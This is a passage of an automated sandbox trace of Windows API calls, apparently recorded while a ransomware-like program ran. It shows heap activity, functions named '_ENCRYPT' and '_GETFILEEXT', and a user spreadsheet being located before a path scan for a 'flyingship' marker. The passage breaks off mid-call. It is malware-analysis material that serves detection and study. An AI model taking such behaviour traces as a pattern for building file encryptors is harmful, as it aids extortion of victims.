hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0169.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0169.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0169.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0169.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0169.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0169.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0169.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0169.014] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0169.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0169.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0169.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0169.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0169.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0169.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0169.015] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0169.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0169.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0169.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0169.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0169.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0169.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0169.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0169.016] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0169.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0169.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0169.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0169.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0169.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba4e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0169.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0169.016] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0169.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0169.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0169.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0169.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0169.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0169.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0169.017] CloseHandle (hObject=0x120) returned 1 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0169.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0169.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.017] FreeLibrary (hLibModule=0x75990000) returned 1 [0169.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0169.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0169.018] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0169.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0169.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0169.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0169.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0169.018] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0169.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0169.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0169.019] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0169.019] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0169.019] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0169.019] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0169.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0169.019] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0169.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0169.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0169.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0169.020] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.020] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.020] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862f1b80, ftCreationTime.dwHighDateTime=0x1d57779, ftLastAccessTime.dwLowDateTime=0x8cd8dec0, ftLastAccessTime.dwHighDateTime=0x1d57a90, ftLastWriteTime.dwLowDateTime=0x8cd8dec0, ftLastWriteTime.dwHighDateTime=0x1d57a90, nFileSizeHigh=0x0, nFileSizeLow=0x138f3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="F8kGUIlkgYER.xlsx", cAlternateFileName="F8KGUI~1.XLS")) returned 0x90add8 [0169.020] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0169.020] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.020] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862f1b80, ftCreationTime.dwHighDateTime=0x1d57779, ftLastAccessTime.dwLowDateTime=0x8cd8dec0, ftLastAccessTime.dwHighDateTime=0x1d57a90, ftLastWriteTime.dwLowDateTime=0x8cd8dec0, ftLastWriteTime.dwHighDateTime=0x1d57a90, nFileSizeHigh=0x0, nFileSizeLow=0x138f3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="F8kGUIlkgYER.xlsx", cAlternateFileName="F8KGUI~1.XLS")) returned 0x90add8 [0169.020] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0169.020] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kGUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GUIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UIlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IlkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 